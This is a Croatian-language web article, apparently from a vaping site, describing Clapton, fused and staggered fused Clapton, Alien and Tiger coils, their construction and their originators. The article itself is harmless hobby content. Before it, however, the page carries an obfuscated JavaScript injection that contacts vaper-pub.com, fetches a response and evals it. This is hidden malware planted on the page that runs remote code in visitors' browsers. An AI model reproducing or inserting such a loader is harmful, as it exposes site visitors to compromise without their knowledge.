;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Što su Clapton, Alien i ostale zavojnice za koje ste možda čuli

Kad je vaping prvi put došao na scenu, zavojnice su bile izrađene samo od tankih pojedinačnih žica od nekoliko vrsta materijala. Od tada, vaperi smišljaju inovativne načine kako poboljšati svoje iskustvo, bilo da se radi o većim oblacima ili boljem okusu.

Neizbježno je rođena Clapton zavojnica koja je ubrzo stekla globalnu popularnost. Riječ Clapton često se koristi za niz zavojnica koje se sastoje od više omotanih žica. Mogu se izraditi s različitim vrstama i debljinama vape žica, najčešće Kanthal, nehrđajući čelik ili nichrome.

Općenito, višežilne zavojnice poput Claptona koriste se najčešće za RBA atomizere —posebice jer su ove zavojnice preplavile tržište sub-omskih atomizera. Neki primjeri uključuju spojene Claptone, Aliene, itd. Izvorni Clapton također je bio jedna od prvih zavojnica za koje je bila potrebna električna bušilica, što je postavilo standard za većinu egzotičnih izrada zavojnica. U ovom vodiču objašnjavamo što je Clapton i pokrivamo neke od njenih najpopularnijih varijacija.

Što je točno Clapton zavojnica?

Standardna Clapton zavojnica je tanja žica čvrsto omotana oko deblje jezgre. Claptoni imaju sporije vrijeme zagrijavanja od običnih žica, ali se smatra da daju bolju aromu zbog svoje teksture i povećane površine. Izvorno, Clapton zavojnice i zavojnice sličnog stila najčešće su se koristile za sub-ohming i parenje izravno u pluća, ali danas ih možete vidjeti u različitim vrstama atomizera. Korištenje tanje žice i manjeg unutarnjeg promjera to omogućuje.

Originalnu Clapton zavojnicu osmislio je ECF veteran mrdee3 dok je gledao svog prijatelja kako svira gitaru. Stvorio ju je namotavanjem žice debljine 32ga oko jezgre debljine 24ga pomoću električne bušilice. Izgleda kao žica za gitaru, a ime odaje počast gitaristu Ericu Claptonu.

 • Clapton zavojnice dolaze u širokom rasponu otpora; od ispod oma do iznad jednog oma
 • Claptoni su dostupni u promjerima i otporima koji odgovaraju većini RDA i RTA atomizera za koje se koriste
 • Dostupan za korištenje u power modu (uglavnom Kanthal, SS ili nichrome) ili za kontrolu temperature (uglavnom od SS-a)
 • Umjereno težak za DIY, ali dostižan uz praksu i odgovarajuće alate

A što je onda Fused Clapton?

Fused Clapton je tanja žica omotana oko dvije ili više debljih jezgri. Višestruke jezgre daju ovim Claptonima brže zagrijavanje, a i uz to i bolji okus od zbog povećanja površine.

Izraz “fused” odnosi se na postupak omotavanja više žica tanjom vanjskom žicom. Ovo je u biti paralelna konstrukcija koja je “Claptonizirana”. Većina višežičnih zavojnica poput Aliena također su međusobno spojene na sličan način. Koncept je potekao od vapera poznatog kao Squidoode, a popularizirali su ga Twisted Messes i drugi popularni vaperi koji se bave izradom svojih zavojnica.

A što je Staggered Fused Clapton?

Staggered Fused Clapton je tanja žica omotana oko dvostruke Claptonove jezgre. Claptonizirane jezgre i raspoređeni vanjski omotač stvaraju dodatnu teksturu i površinu. To mu daje sporije vrijeme zagrijavanja, ali prednost u pogledu okusa u odnosu na standardni fused Clapton.

Efekt “raspoređenog” (staggered) postiže se pravljenjem Claptona s dva tanka paralelna pramena, a zatim uklanjanjem jednog od njih, stvarajući Clapton s ravnomjerno raspoređenim vanjskim zavojima. Zatim se taj Clapton prereže na pola i spoji tanjom žicom. Squidoode je zaslužan za ovu zavojnicu.

 • Ovi Claptoni dolaze s niskim otporom za izravno isparavanje u pluća
 • Često su debeli i zahtijevaju vrlo velike rupe za stupove ili deck u stilu stezaljke
 • Izrađeni su od tanke žice omotane oko dvije paralelne Claptonove jezgre i imaju ravnomjerno raspoređene vanjske omote
 • Teže ih je napraviti od gore spomenutih Claptona, ali svakako uvijek možete kupiti gotove zavojnice ovog tipa ukoliko ih želite isprobati

Što je Alien zavojnica?

Alien je vrlo sličan fused Claptonu, osim što vanjski omot ima vrlo specifičnu teksturu.

Teksturirani vanjski omotač postiže se izgradnjom običnog Claptona, zatim pažljivim uklanjanjem unutarnje jezgre. Zatim se omota oko jezgre s više niti koja sadrži isti promjer kao i originalna jezgra koja je uklonjena. Prvi vaper koji je ovo uspio poznat je kao Blueeyedgoon83.

 • Alien Claptoni dolaze s niskim otporom za sub ohm vaping
 • Alieni su obično debeli i zahtijevaju deck s velikim rupama za stupove ili onaj u stilu stezaljke
 • Izrađeni su od Claptona bez jezgre omotanog oko tri ili više paralelnih jezgri
 • Teško ih je usavršiti i zahtijevaju majstorstvo izrade Claptona i fused Claptona

Što je Tiger Coil?

Tiger zavojnica jednostavno je samo uvrnuta zavojnica koja sadrži jednu okruglu nit žice i jednu ravnu vrpcu. Uvijanje dviju žica različitog oblika daje više džepova i utora od standardne uvrnute (twisted) zavojnice. To stvara više topline i gušću paru, što daje bolji okus u odnosu na jednostruke zavojnice.

Tiger zavojnice također imaju zanimljivu estetiku, izgledaju poput bodljikave žice i zapravo ne zahtijevaju puno truda da se naprave. Danas nisu toliko popularne, ali se još uvijek koriste za izradu većih, egzotičnijih zavojnica. Leon Shin je zaslužan kao prva osoba koja je smislila originalni koncept.

 • Tiger zavojnice imaju nizak otpor, ali se mogu koristiti i za izravno plućno i za MTL vaping
 • Tiger zavojnice su malo deblje od twisted zavojnica, ali se uklapaju u većinu standardnih deckova
 • Sastoje se od dvije upletene žice – jedne okrugle niti i jedne ravne vrpce
 • Vrlo ih je jednostavno napraviti ako ste dobri u izradi twisted zavojnica
Choose your Reaction!
Leave a Comment